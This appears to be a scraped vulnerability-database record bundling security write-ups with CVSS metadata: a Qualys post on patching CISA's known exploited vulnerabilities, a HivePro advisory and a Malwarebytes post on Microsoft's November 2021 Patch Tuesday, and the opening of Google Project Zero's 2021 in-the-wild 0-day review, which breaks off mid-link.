Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/patch-mgmt-windows2.jpg)\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-6.jpg)\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2021-11-26T17:20:32", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.![](chrome-extension://gmpljdlgcdkljlppaekciacdmdlhfeon/images/beside-link-icon.svg)](<https://www.hivepro.com/wp-content/uploads/2021/11/Microsofts-Patch-Tuesday-Security-Updates-for-November_TA202147.pdf>)\n\nFor the month of November, Microsoft has reported a total of 55 vulnerabilities, 6(CVE-2021-38666, CVE-2021-26443, CVE-2021-42279, CVE-2021-42298, CVE-2021-42316, CVE-2021-3711) of which have been rated critical. Four (CVE-2021-43208, CVE-2021-43209) of these vulnerabilities have been publicly known and two (CVE-2021-42292, CVE-2021-42321) of them have been exploited in the wild. Patches of all these vulnerabilities have been published by Microsoft. This Advisory only focuses on the important 12 vulnerabilities.\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/11/VD-01-1024x698.png) ![](https://www.hivepro.com/wp-content/uploads/2021/11/VD-02_1-1024x660.png) ![](https://www.hivepro.com/wp-content/uploads/2021/11/VD-02_02-1024x620.png)\n\n * ![](https://www.hivepro.com/wp-content/uploads/2021/11/VD-03-1024x510.png)\n\n#### Patch Link\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42292>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43208>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43209>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38631>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41371>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38666>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26443>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42279>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42298>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42316>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-3711>\n\n#### References\n\n<https://threatpost.com/microsoft-nov-patch-tuesday-fixes-six-zero-days-55-bugs/176143/>\n\n<https://www.zerodayinitiative.com/blog/2021/11/9/the-november-2021-security-update-review>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-10T11:20:36", "type": "hivepro", "title": "Microsoft\u2019s Patch Tuesday Security Updates for November", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26443", "CVE-2021-3711", "CVE-2021-38631", "CVE-2021-38666", "CVE-2021-41371", "CVE-2021-42279", "CVE-2021-42292", "CVE-2021-42298", "CVE-2021-42316", "CVE-2021-42321", "CVE-2021-43208", "CVE-2021-43209"], "modified": "2021-11-10T11:20:36", "id": "HIVEPRO:846AE370AF77A81941A26AF3FC365026", "href": "https://www.hivepro.com/microsofts-patch-tuesday-security-updates-for-november/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-11-18T19:06:32", "description": "On what might seem a relatively calm Patch Tuesday with 55 vulnerabilities being patched, the fact that six of them were rated \u201cCritical\u201d and two of them actively exploited spoils the Zen factor somewhat.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Let\u2019s have a look at the most interesting ones that were patched in this Patch Tuesday [update](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Nov>).\n\n### Exchange Server (again)\n\n[CVE-2021-42321](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42321>): A Microsoft Exchange Server Remote Code Execution (RCE) vulnerability that is known to be exploited in the wild. This vulnerability was disclosed during the [Tianfu International Cybersecurity Contest](<http://www.tianfucup.com/en>) and requires an authenticated user to run arbitrary code on an on-premise Exchange Server.\n\nTwo other Exchange Server vulnerabilities, rated as \u201cImportant\u201d are listed under [CVE-2021-42305](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42305>) and [CVE-2021-41349](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41349>). Both are Microsoft Exchange Server Spoofing vulnerabilities. The exploitation appears to be easy as the attack can be initiated remotely and no form of authentication is required for a successful exploitation. However, successful exploitation does require user interaction by the victim.\n\n### Excel\n\n[CVE-2021-42292](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42292>): A Microsoft Excel Security Feature Bypass vulnerability which is also being exploited in the wild. Microsoft doesn\u2019t suggest what effect the vulnerability might have, but its [CVSS score](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) of 7.8 out of 10 is worrying Two interesting notes in the [Microsoft FAQ](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42292>) about this vulnerability:\n\n * No, the Preview Pane is not an attack vector.\n * The security update for Microsoft Office 2019 for Mac and Microsoft Office LTSC for Mac 2021 are not immediately available. The updates will be released as soon as possible, and when they are available, customers will be notified via a revision to this CVE information.\n\n### Remote Desktop Protocol (RDP)\n\nAs if RDP wasn\u2019t [a big enough problem](<https://blog.malwarebytes.com/malwarebytes-news/2021/02/rdp-the-ransomware-problem-that-wont-go-away/>) already, four vulnerabilities have been found in this widely abused protocol. Three of them are Information Disclosure vulnerabilities and one, listed under [CVE-2021-38666](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38666>) is a \u201cCritical\u201d RCE. The attack can be initiated remotely and no form of authentication is needed for a successful exploitation. It does however require the victim\u2019s interaction.\n\n### 3D Viewer\n\nThe Microsoft 3D Viewer lets you view 3D models with lighting controls, inspect model data and visualize different shading modes. Two \u201cImportant\u201d RCE vulnerabilities in this utility have been patched in this update. They are listed under [CVE-2021-43208](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43208>) and [CVE-2021-43209](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43209>). The Microsoft Store will automatically update affected customers. Alternatively, customers can get the update [immediately](<https://support.microsoft.com/en-us/account-billing/get-updates-for-apps-and-games-in-microsoft-store-a1fe19c0-532d-ec47-7035-d1c5a1dd464f>). App package versions 7.2107.7012.0 and later contain this update.\n\n### Microsoft Defender\n\n[CVE-2021-42298](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42298>) is a Microsoft Defender Remote Code Execution vulnerability that is rated \u201cCritical.\u201d Defender is designed to scan every file and run with some of the highest levels or privileges in the operating system. An attack can be initiated remotely without any form of authentication. But successful exploitation requires user interaction by the victim. There are neither technical details nor an exploit publicly available.\n\n### Other patches\n\nIt's not just Microsoft who has issued patches recently, so check you're using the most up to date version of the below, too.\n\n[Siemens](<https://cert-portal.siemens.com/productcert/pdf/ssa-114589.pdf>) issued updates to patch vulnerabilities in in the Nucleus RTOS (realtime operating system) versions Nucleus 4 and Nucleus ReadyStart (Nucleus 3). The vulnerabilities [CVE-2021-31886](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31886>), [CVE-2021-31887](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31887>) and [CVE-2021-31888](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31888>) have the highest CVSS scores with 10.0, 9.9 and 9.9 out of 10 respectively.\n\n[Citrix](<https://support.citrix.com/article/CTX330728>) published information about vulnerabilities that have been discovered in Citrix ADC (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway), and Citrix SD-WAN WANOP Edition models 4000-WO, 4100-WO, 5000-WO, and 5100-WO.\n\n[Adobe](<https://helpx.adobe.com/security.html>) made security updates available for RoboHelp Server, Adobe InCopy, and Adobe Creative Cloud.\n\n[An](<https://source.android.com/security/bulletin/2021-11-01>)[droid](<https://source.android.com/security/bulletin/2021-11-01>) published a security bulletin last week, which we [discussed in detail](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/google-patches-zero-day-vulnerability-and-others-in-android/>) here.\n\n[Cisco](<https://tools.cisco.com/security/center/publicationListing.x>) published a security advisory that mentions two \u201cCritical\u201d issues. One in Cisco Policy Suite Static SSH Keys, and one concerning Cisco Catalyst PON Series Switches Optical Network Terminal.\n\n[SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=589496864>) has its own Patch Day Security Notes. One vulnerability listed under [CVE-2021-40501](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40501>) has a CVSS score of 9.6 out of 10 and the description Missing Authorization check in ABAP Platform Kernel.\n\n[VMWare](<https://www.vmware.com/security/advisories.html>)\u2019s security advisory includes one critical update for VMware vCenter Server which addresses multiple security vulnerabilities.\n\n[Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>) also issued several security advisories, which are fixes or workarounds for vulnerabilities identified in Intel products.\n\nIn case you have no idea where to start, maybe our post about [the CISA directive to reduce the risk of known exploited vulnerabilities](<https://blog.malwarebytes.com/reports/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities/>) will help you on your way.\n\n## Update Novermber 17, 2021\n\nMicrosoft has released a patch for Microsoft Office 2019 for Mac and Microsoft Office LTSC for Mac 2021 to tackle the possible security feature bypass listed as [CVE-2021-42294](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42292>). Customers running affected Mac software should install the update for their product to be protected from this vulnerability. Customers running other Microsoft Office software do not need to take any action.\n\nThe same patch includes a solution for [CVE-2021-40442](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40442>) a Microsoft Excel Remote Code Execution vulnerability which also affected Microsoft Office 2019 for Mac and Microsoft Office LTSC for Mac 2021.\n\nStay safe, everyone!\n\nThe post [[updated] Patch now! Microsoft plugs actively exploited zero-days and other updates](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/patch-now-microsoft-plugs-actively-exploited-zero-days-and-other-updates/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-11-10T14:30:23", "type": "malwarebytes", "title": "[updated] Patch now! Microsoft plugs actively exploited zero-days and other updates", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-31886", "CVE-2021-31887", "CVE-2021-31888", "CVE-2021-38666", "CVE-2021-40442", "CVE-2021-40501", "CVE-2021-41349", "CVE-2021-42292", "CVE-2021-42294", "CVE-2021-42298", "CVE-2021-42305", "CVE-2021-42321", "CVE-2021-43208", "CVE-2021-43209"], "modified": "2021-11-10T14:30:23", "id": "MALWAREBYTES:459DABFC50E1B6D279EDCFD609D8DD50", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/patch-now-microsoft-plugs-actively-exploited-zero-days-and-other-updates/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2022-08-25T01:57:30", "description": "A Year in Review of 0-days Used In-the-Wild in 2021\n\nPosted by Maddie Stone, Google Project Zero\n\nThis is our third annual year in review of 0-days exploited in-the-wild [[2020](<https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html>), [2019](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>)]. Each year we\u2019ve looked back at all of the detected and disclosed in-the-wild 0-days as a group and synthesized what we think the trends and takeaways are. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you\u2019re interested in the analysis of individual exploits, please check out our [root cause analysis repository](<https://googleprojectzero.blogspot.com/p/rca.html>).\n\nWe perform and share this analysis in order to make 0-day hard. We want it to be more costly, more resource intensive, and overall more difficult for attackers to use 0-day capabilities. 2021 highlighted just how important it is to stay relentless in our pursuit to make it harder for attackers to exploit users with 0-days. We heard [over](<https://forbiddenstories.org/about-the-pegasus-project/>) and [over](<https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/>) and [over](<https://www.amnesty.org/en/latest/research/2021/11/devices-of-palestinian-human-rights-defenders-hacked-with-nso-groups-pegasus-spyware-2/>) about how governments were targeting journalists, minoritized populations, politicians, human rights defenders, and even security researchers around the world. The decisions we make in the security and tech communities can have real impacts on society and our fellow humans\u2019 lives.\n\nWe\u2019ll provide our evidence and process for our conclusions in the body of this post, and then wrap it all up with our thoughts on next steps and hopes for 2022 in the conclusion. If digging into the bits and bytes is not your thing, then feel free to just check-out the Executive Summary and Conclusion.\n\n# Executive Summary\n\n2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That\u2019s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We\u2019ve tracked publicly known in-the-wild 0-day exploits in [this spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) since mid-2014.\n\nWhile we often talk about the number of 0-day exploits used in-the-wild, what we\u2019re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.\n\nWith this record number of in-the-wild 0-days to analyze we saw that attacker methodology hasn\u2019t actually had to change much from previous years. Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces. Project Zero\u2019s mission is \u201cmake 0day hard\u201d. 0-day will be harder when, overall, attackers are not able to use public methods and techniques for developing their 0-day exploits. When we look over these 58 0-days used in 2021, what we see instead are 0-days that are similar to previous & publicly known vulnerabilities. Only two 0-days stood out as novel: one for the technical sophistication of its exploit and the other for its use of logic bugs to escape the sandbox.\n\nSo while we recognize the industry\u2019s improvement in the detection and disclosure of in-the-wild 0-days, we also acknowledge that there\u2019s a lot more improving to be done. Having access to more \u201cground truth\u201d of how attackers are actually using 0-days shows us that they are able to have success by using previously known techniques and methods rather than having to invest in developing novel techniques. This is a clear area of opportunity for the tech industry.\n\nWe had so many more data points in 2021 to learn about attacker behavior than we\u2019ve had in the past. Having all this data, though, has left us with even more questions than we had before. Unfortunately, attackers who actively use 0-day exploits do not share the 0-days they\u2019re using or what percentage of 0-days we\u2019re missing in our tracking, so we\u2019ll never know exactly what proportion of 0-days are currently being found and disclosed publicly. \n\nBased on our analysis of the 2021 0-days we hope to see the following progress in 2022 in order to continue taking steps towards making 0-day hard:\n\n 1. All vendors agree to disclose the in-the-wild exploitation status of vulnerabilities in their security bulletins.\n 2. Exploit samples or detailed technical descriptions of the exploits are shared more widely.\n 3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.Launch mitigations that will significantly impact the exploitability of memory corruption vulnerabilities.\n\n# A Record Year for In-the-Wild 0-days\n\n2021 was a record year for in-the-wild 0-days. So what happened?\n\n[![bar graph showing the number of in-the-wild 0-day detected per year from 2015-2021. The totals are taken from this tracking spreadsheet: 